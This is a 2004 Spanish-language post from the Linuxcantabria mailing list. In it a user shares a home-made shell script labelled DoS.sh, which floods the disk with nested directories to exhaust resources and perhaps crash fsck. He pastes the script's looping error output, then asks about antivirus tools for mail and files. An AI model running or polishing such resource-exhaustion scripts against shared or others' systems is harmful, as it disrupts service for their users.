[Linuxcantabria] Ataques Denny of Service y antivirus

FraGMenT fragment en telefonica.net
Mar Mayo 25 09:08:05 UTC 2004


Yo he probado mi propio script:

root en luthien:/home/fragment# more DoS.sh
#SCRIPT CABRON BY FRAGMENT xD

DEPTH=65000
ruta=pwd

while [ true ];
do
        while [ $DEPTH ];
        do
                mkdir T
                cd T
                sync
        done;
        touch tt
        find $ruta -name tt
        cd $ruta
        rm -rf T
        echo DoS vuelta
done;
root en luthien:/home/fragment#

Pero no creo ke tengamos ke temer al uso de cpu que esto conlleva ni al espacio de disco que quema ni a un posible ataque DoS sobre el disco duro. Yo creo que el problema no es este, sino que por ejemplo, al reiniciar la maquina y ejecutar rutinariamente "fsck" este puede devolver un segmentation fault xD
Ahi es donde le veo yo el mayor peligro :(

Sobre el antivirus, pues no tengo ningun servidor de correo, pero si que recibo correos (actualmente con sylpheed) y me gustaria saber como revisarlos. Además tambien de un antivirus para revisar el sistema de ficheros.

Gracias de nuevo :-)

PD:
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists
DoS.sh: line 11: cd: T: No such file or directory
mkdir: cannot create directory `T': File exists

jajajajjajajajaj



More information about the Linuxcantabria mailing list